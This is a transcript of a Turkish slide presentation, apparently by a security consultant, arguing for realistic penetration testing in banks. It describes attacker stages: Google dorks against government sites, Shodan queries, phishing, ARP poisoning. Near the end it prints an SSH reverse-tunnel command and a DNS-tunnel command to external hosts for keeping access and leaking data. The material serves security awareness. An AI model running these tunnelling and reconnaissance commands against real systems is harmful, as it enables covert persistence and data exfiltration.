Bilgi Güvenliği Açısından Sızma Testlerinin Önemi



Benzer belgeler
Saldırgan Yaklaşımı. Nebi Şenol YILMAZ Danışman / Yönetici Ortak senol.yilmaz@secrove.com. Secrove Information Security Consulting

Bankacılıkta Admin Riskleri ve Bellekte Avcılık

Bankacılıkta Mobil Uygulamaların Geleceği ve Beraberindeki Riskler

VoIP Pentest NetSEC / Microso3 Türkiye Ozan UÇAR ozan.ucar@bga.com.tr

Ağ Sızma Testleri ve 2. Katman Saldırıları Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı

ORTA DOĞU TEKNİK ÜNİVERSİTESİ BİLGİ İŞLEM DAİRE BAŞKANLIĞI. Güvenlik ve Virüsler. ODTÜ BİDB İbrahim Çalışır, Ozan Tuğluk, Cengiz Acartürk

SPK Bilgi Sistemleri Tebliğleri

KONYA GIDA VE TARIM ÜNİVERSİTESİ BİLGİ İŞLEM DAİRE BAŞKANLIĞI SIZMA TESTİ HİZMET ALIMI VE KURUMSAL SOME EĞİTİMİ TEKNİK ŞARTNAMESİ

Bilgi Güvenliği Denetim Sürecinde Özgür Yazılımlar. Fatih Özavcı Bilgi Güvenliği Danışmanı

Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR

Web Application Penetration Test Report


Mobil Uygulamalarda Güvenlik Denetimi

İstemci Tabanlı Saldırı Türleri. Ozan UÇAR

SPK Bilgi Sistemleri Tebliğleri

Özgür Yazılımlar ile VoIP Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı

BANKACILIK DÜZENLEME VE DENETLEME KURUMU (Bilgi Yönetimi Dairesi)

BEYAZ ŞAPKALI HACKER EĞİTİMİ

KABLOSUZ AĞ GÜVENLİĞİNE KURUMSAL BAKIŞ

SÜRE BAŞLAMA TARİHİ : 19/12/2018 BİTİŞ TARİHİ : 20/02/2019 KURS SÜRESİ : 144 Saat KURS NO :

Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR

Internet Nedir? Devlet Kurumları. Internet Servis Sağlayıcılar. Lokal Ağ. Eğitim Kurumları. Kişisel Bilgisayar. Dizüstü Bilgisayar.

Ağ Topolojisi ve Ağ Yazılımları

Güvenlik Araçları. Savunmadan çok saldırı ya yönelik araçlar. Amaç, saldırganlardan önce sistemdeki açıkları ortaya çıkarıp gereken önlemleri almak.

AMAÇLAR: GÜVENLİK TESTLERİNDE BİLGİ TOPLAMA: AKTİF BİLGİ TOPLAMA

BİLİŞİM SİSTEMLERİ GÜVENLİĞİ EĞİTİM KATALOĞU (2015)

Google Hacking. Gelişmiş Google Operatörleri

Veritabanı Sızma Testleri Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı

Siber Teröristlere Karşı Kurumlar Nasıl Korunmalıdır? Yusuf TULGAR NetDataSoft Genel Müdürü

Gelişen Tehdit Ortamı ve Senaryolaştırma. İhsan Büyükuğur Garanti Bankası Teftiş Kurulu Program Yöneticisi - Teknoloji ve Kurum Dışı Riskleri

06 - Bilgi Toplama ve Sosyal Mühendislik

KISIM I: HACKING B R ALAN OLARAK GÜVENL K

HAZIRLAYAN BEDRİ SERTKAYA Sistem Uzmanı CEH EĞİTMENİ

01 Şirket Profili

SOC unuz siber saldırılara hazır mı?

IPv6 Saldırı Araçları ve IPv6-GO Uygulamaları. Emre YÜCE - TÜBİTAK ULAKBİM 6 Mayıs 2010

1 WEB GÜVENLIĞINE GIRIŞ

SIZMA TESTİ, EĞİTİM VE DANIŞMANLIK HİZMETİ VEREN PERSONEL VE FİRMALAR İÇİN YETKİLENDİRME PROGRAMI

Firewall/IPS Güvenlik Testleri Eğitimi

/pikalite / bilgipi /pikalite EĞİTİM HİZMETLERİMİZ

Hakkında ARGE SECOPS EĞİTİM MSSP SOME / SOC PENTEST. BGA Bilgi Güvenliği A.Ş.

Ülkemizdeki Üniversite Web Sayfalarının Siber Güvenlik Açısından Hızlı Bir Değerlendirmesi

Computer and Network Security Cemalettin Kaya Güz Dönemi

İnternet Arama Motorları. Cengiz KARADUMAN Tıbbi Dokümantasyon ve Sekreterlik

ULUSAL BİLGİ SİSTEMLERİSTEMLERİ GÜVENLİK PROGRAMI

KKTC MERKEZ BANKASI. SIZMA TESTLERİ GENELGESİ (Genelge No: 2015/01) Mart-2015 BANKACILIK DÜZENLEME VE GÖZETİM MÜDÜRLÜĞÜ

HAVELSAN Siber Güvenlik Akademisi. Önlenemiyorsa Korunmak için Eğitim

Viproy Bilgi Güvenliği Eğitimleri Rehberi

NGN ve VoIP Ağları Güvenlik Denetimi

ZAFİYET TESPİTİ VE SIZMA YÖNTEMLERİ. Eyüp ÇELİK Bilgi Teknolojileri Güvenlik Uzmanı

Mobil Güvenlik ve Denetim

TÜRKSAT UYDU HABERLEŞME KABLO TV VE İŞLETME A.Ş. İŞÇİ STATÜSÜNDE PERSONEL ALIM İLANI (Bilişim Hizmetleri)

Güvenli İnternet Teknolojileri. Kurumsal Şirket Tanıtımı

Internetin Yapı Taşları

DARÜŞŞAFAKA CEMİYETİ HOTSPOT İNTERNET ERİŞİMİ YAZILIM VE DONANIM ALTYAPISI KURULUMU VE BAKIM HİZMETİ TEKNİK ŞARTNAMESİ

SOME niz SOC unuz} siber olaylara hazır mı? VOLKAN ERTÜRK C EO & C O F O U N D E R BARİKAT II : Güvenliğin Temelleri

«Günümüzün Siber Saldırıları, Veri Sızıntıları ve Çözüm Yolları...»

«bir pentest gördüm sanki» Test sırasında olanlar ve olması gerekenler hakkında...

Bilgi Güvenliği Semineri

SIZMA TESTİ EĞİTİMLERİ

Bilgi Güvenliği AKADEMİSİ Eği3m Dosyası

Güvenlik Riskleri ve Saldırı Yöntemleri. Ozan UÇAR Bilgi Güvenliği Akademisi (BGA)

Özgür Yazılımlar ile VoIP Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı

Özgür Yazılımlar ile VoIP Denetimi. Fatih Özavcı Bilgi Güveniği Danışmanı

Armitage Nedir? Kullanım Öncesi

ÖNDER BİLGİSAYAR KURSU. Sistem ve Ağ Uzmanlığı Eğitimi İçeriği

Kurumsal Ağlarda Web Sistem Güvenliği

Kimsin Sen? /in/ahmet-dervis /adervis3 SauSiber adrvs.wordpress.com

Siber Güvenlik Risklerinin Tanımlanması / Siber Güvenlik Yönetişimi

ANET Bilgi Güvenliği Yönetimi ve ISO Ertuğrul AKBAS [ANET YAZILIM]

Özgür Yazılımlar ile Kablosuz Ağ Denetimi

Linux Temelli Zararlı Yazılımların Bulaşma Teknikleri, Engellenmesi ve Temizlenmesi

BİLGİSAYAR VE AĞ GÜVENLİĞİ ÖĞR. GÖR. MUSTAFA ÇETİNKAYA DERS 2 > AĞ VE UYGULAMA GÜVENLİĞİ

ÇAĞRI MERKEZİ SYS SESLI YANIT SISTEMLERI


Yerel Ağlarda Port 139 ve Saldırı Yöntemi

Sisteminiz Artık Daha Güvenli ve Sorunsuz...

YMT 412-Yazılım Kalite Ve Güvencesi Yazılım Test Araçları 1/37

Ders Kodu Yarıyıl T+U Saat Kredi AKTS. Programlama Dilleri

VOIP Ağlara Yönelik Sızma Testleri

NP301. K&K NP301 Sanal COM portu tanımlama adımları ADIM-1

BTK nın IPv6 ya İlişkin Çalışmaları

Remote access? Tabi ki!

anka Siber Güvenlik Analiz Sistemleri Geleceğe Güven Tesis Eder

Bulut Bilişimin Hayatımızdaki Yeri İnternet Haftası Etkinlikleri 17 Nisan Yard.Doç.Dr.Tuncay Ercan

Sibergüvenlik Faaliyetleri

Clonera Bulut Felaket Kurtarma ve İş Sürekliliği Çözümü

KURUM AĞLARINI ÖNEMLĠ ZARARLI YAZILIM SALDIRILARINDAN KORUMA. Osman PAMUK

HAKKIMIZDA. Sizin Hayalleriniz. Bizim İşimiz. Neden Bizi Tercih Etmelisiniz? İşimizde Uzmanız. Kalite Politikamız. Yenilikçi ve Üretkeniz

06 - Bilgi Toplama ve Sosyal Mühendislik

Kampüs Ağ Yönetimi. Ar. Gör. Enis Karaarslan Ege Ü. Kampüs Network Yöneticisi. Ege Üniversitesi BİTAM Kampüs Network Yönetim Grubu

1. Bu alana anketi dolduran kişinin kimlik ve kurum/kuruluş ve iletişim bilgileri yazılmalıdır.

ANET YAZILIM LOG YÖNETİMİ. Karşılaştırma Tablosu ANET YAZILIM

Veri(Data), sayısal veya mantıksal her değer bir veridir. Bilgi(Information), verinin işlenmiş, anlamlı hale gelmişşekline bilgi denir.

Kadın Girişimcilerimizin Yolunu Aydınlatıyoruz!...

Ulusal IPv6 Protokol Altyapısı Tasarımı ve Geçişi Projesi. Onur Bektaş (ULAKBİM) Sistem Yöneticisi

ANET YAZILIM LOG YÖNETİMİ. Karşılaştırma Tablosu ANET YAZILIM

DOS vs Kurumsal Güvenlik. 15 Şubat 2011 Murat H. CANDAN

Transkript:

Bilgi Güvenliği Açısından Sızma Testlerinin Önemi Nebi Şenol YILMAZ Danışman / Yönetici Ortak senol.yilmaz@secrove.com

Hakkımda Nebi Şenol YILMAZ, CISA, CEH, ISO 27001 LA Bilgi Güvenliği Danışmanlığı Bilgi Sistemleri Denetimi Penetrasyon Testleri Zafiyet Araştırması Exploit Geliştirme Bilgi Güvenliği Ar-Ge (Tubitak Destekli) 2

Hakkımda IT Auditor, HSBC Bank A.Ş. Information Security Manager, E-Bay Turkiye Info. Security Researcher, Tubitak UEKAE Software Engineer, ODTU 3

Ajanda Regülasyon Neden Sızma Testi? Nasıl Olmalı? Özet 4

Regülasyon Bankalarda Bilgi Sistemleri Yönetiminde Esas Alınacak İlkelere İlişkin Tebliğ, 01.06.2010 Bilgi Sistemlerine İlişkin Sızma Testleri Genelgesi, 24.07.2012 5

Regülasyon Kapsam İletişim Altyapısı ve Aktif Cihazlar DNS Servisleri Etki Alanı ve Kullanıcı Bilgisayarları E-Posta Servisleri Veritabanı Sistemleri Web Uygulamaları Mobil Uygulamalar Kablosuz Ağ Sistemleri ATM Sistemleri Dağıtık Servis Dışı Bırakma Testleri Sosyal Mühendislik Testleri 6

Neden Sızma Testi? Bir adım öne geçmek, Eksikleri gidermek, Stabil sistemler oluşturmak, Kademeli güvenlik anlayışını oluşturmak... fakat Yapmış olmak için..., YAPILMAMALI 7

Nasıl Olmalı? En az BDDK kapsamında, Mutlaka Saldırgan yaklaşımını gözönünde bulundurarak. 8

Nasıl Olmalı? Hem içerden, hem dışardan. 9

Nasıl Olmalı? Daha fazla bulgu, kurum yararına. 10

Nasıl Olmalı? Saldırganda zaman kısıtı bulunmuyor!!! 11

Akla gelen her şekilde... Facebook Personel ortak portalı Toplantılar, seminerler Gözardı edilen her nokta... VoIP, Çağrı sistemi, destek bağlantı hattı, yedek sistemler Alternatif giriş yolu Pos cihazları ATM cihazları Giriş için her yol mübah... 12

Bilgi Toplama Google, Shodan, kurum sitesi, dergi, gazete, whois, nslookup Tarama Nmap, nessus, sslscan Erişim Sağlama Metasploit, telnet, sslstrip, dnstunnel, ssh, arpspoof Erişimi Sürdürme Netcat, ssh Saldırı Gizlemek Ssh, dnstunnel 13

Bilgi Toplama ve Tarama Google Search site:hedefsite.com -www inurl, filetype, intext, intitle... site:gov -www site:gov intitle: index of backup site:gov intitle:index of secret site:treasury.gov -www 14

15

16

17

Bilgi Toplama ve Tarama Shodan Search country:tr net, port, server, os Ip adresi öğrenip devam edelim. www.state.gov net:169.252.0.0/15 Kimlik gizlemek önemli... 18

19

20

21

Erişim Sağlama En zayıf halka her zaman INSAN... Sistemler de saldırgana yardım ediyor :) ve herşey bir mail ile başlayabiliyor... 22

23

24

25

Peki linke tıklandığında neler oluyor...? Remote Exploit Örneği... http://www.youtube.com/watch?v=iksdhqtd34w 26

Artık sahip olduğu erişimi kullanarak daha neler yapabilir? Güvenlik önlemleri alınmamış ağı ele geçirir. Ağ üzerindeki kullanıcı bilgilerini öğrenir. www.ecobank.com Uygulama örneği... 27

ARP Önbellek Zehirlemesi Ağ trafiğini kendi üzerine alır. Bütün ağ trafiğini izleyebilir. Trafik yönlendirme ile tüm istekleri istediği adrese yönlendirir. 28

29

30

31

Ele geçirmiş olduğu bilgisayar veya ağdaki erişimin devamlılığını sağlayacaktır, backdoor yerleştirecektir. Bu kanal üzerinden veri sızdırmasını da sağlayacaktır. SSH Tunnel ssh -R5555:localhost:22 syilmaz@secrove.com 32

Peki iç ağdan dışarıya doğru SSH trafiği bloklanmışsa? DNS Tunnel dns2tcpc -z tunnel.systool.org 85.17.183.194 -c -r ssh -l 4430 33

Özet Sızma testleri zorunluluktan değil ihtiyaçtan yaptırılmalıdır. Testler senaryolar düşünülerek gerçekçi yaptırılmalıdır. Bulguların kurumun yararına olduğu anlaşılmalıdır. 34

Teşekkürler! senol.yilmaz@secrove.com @nsyilmaz nsyilmaz 35